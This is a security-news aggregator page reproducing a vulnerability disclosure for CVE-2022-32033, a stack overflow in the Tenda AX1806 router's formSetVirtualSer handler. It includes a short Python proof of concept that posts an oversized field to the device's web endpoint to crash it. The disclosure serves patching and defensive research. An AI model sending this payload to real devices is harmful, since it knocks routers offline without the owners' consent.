Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32033: IoT-vuln/Tenda/AX1806/formSetVirtualSer at main · d1tto/IoT-vuln

Tenda AX1806 v1.0.0.1 was discovered to contain a stack overflow via the function formSetVirtualSer.

CVE
#vulnerability#web#dos

Overview

  • The device’s official website: https://www.tenda.com.cn/product/AX1806.html
  • Firmware download website: https://www.tenda.com.cn/download/detail-3306.html

Affected version

v1.0.0.1

Vulnerability details

tdhttpd in directory /bin has stack overflow vulnerability. The vulnerability occurrs in the formSetVirtualSer function, which can be accessed via the URL goform/SetVirtualServerCfg.

In function FUN_000631d0, the function sscanf is called to split it and copy to stack buffer without checking its length.

PoC

Poc of Denial of Service(DoS)

import requests

data = { b"list": b’A’*0x400+b’~’ } res = requests.post("http://127.0.0.1/goform/SetVirtualServerCfg", data=data) print(res.content)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda